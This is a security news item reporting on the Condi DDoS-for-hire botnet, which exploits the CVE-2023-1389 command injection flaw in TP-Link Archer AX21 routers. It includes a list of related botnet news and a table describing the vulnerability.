Security News > 2023 > June > New Condi malware builds DDoS botnet out of TP-Link AX21 routers
A new DDoS-as-a-Service botnet called "Condi" emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 Wi-Fi routers to build an army of bots to conduct attacks.
Condi aims to enlist new devices to create a powerful DDoS botnet that can be rented to launch attacks on websites and services.
A new Fortinet report published today explains that Condi targets CVE-2023-1389, a high-severity unauthenticated command injection and remote code execution flaw in the API of the router's web management interface.
Condi is the second DDoS botnet to target this vulnerability after Mirai previously exploited it at the end of April.
To deal with the attack overlaps, Condi has a mechanism that attempts to kill any processes belonging to known competitor botnets.
Regarding Condi's DDoS attack capabilities, the malware supports various TCP and UDP flood methods similar to those of Mirai.
News URL
Related news
- Malware botnets exploit outdated D-Link routers in recent attacks (source)
- Mirai Botnet Variant Exploits Four-Faith Router Vulnerability for DDoS Attacks (source)
- Hackers Exploit Zero-Day in cnPilot Routers to Deploy AIRASHI DDoS Botnet (source)
- Juniper warns of Mirai botnet targeting Session Smart routers (source)
- Juniper warns of Mirai botnet scanning for Session Smart routers (source)
- BadBox malware botnet infects 192,000 Android devices despite disruption (source)
- New botnet exploits vulnerabilities in NVRs, TP-Link routers (source)
- New Mirai botnet targets industrial routers with zero-day exploits (source)
- MikroTik botnet uses misconfigured SPF DNS records to spread malware (source)
- 13,000 MikroTik Routers Hijacked by Botnet for Malspam and Cyberattacks (source)
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2023-03-15 | CVE-2023-1389 | Command Injection vulnerability in Tp-Link Archer Ax21 Firmware TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. | 8.8 |